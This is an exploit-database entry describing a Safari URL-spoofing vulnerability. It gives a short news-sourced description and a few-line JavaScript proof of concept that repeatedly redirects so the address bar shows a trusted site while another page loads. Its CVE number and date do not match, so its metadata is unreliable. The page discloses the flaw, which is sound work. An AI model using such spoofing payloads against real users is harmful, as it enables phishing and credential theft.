Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-30644 | CWE-601 | Not specified | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | Medium | Remote | 2015-05-19 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N | 0.02192 | 0.50148 |
Apple Safari Browser Vulnerable to URL Spoofing Vulnerability A serious security vulnerability has been uncovered in Apples Safari web browser that could trick Safari users into visiting a malicious website with the genuine web address. A group of researchers, known as Deusen, has demonstrated how the address spoofing vulnerability could be exploited by hackers to fool victim into thinking they are visiting a trusted website when actually the Safari browser is connected to an entirely different address. This flaw could let an attacker lead Safari users to a malicious site instead of a trusted website they willing to connect to install malicious software and steal their login credentials. - See more at: http://thehackernews.com/2015/05/safari-url-spoofing.html#sthash.wXwd1Q9W.dpuf --- POC --------------------------------------- <script> function f() { location="dailymail.co.uk/home/index.htm"+Math.random(); } setInterval("f()",10); </script> - See more at: http://thehackernews.com/2015/05/safari-url-spoofing.html#sthash.HmJRX1gF.dpuf --- POC ---------------------------------------
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.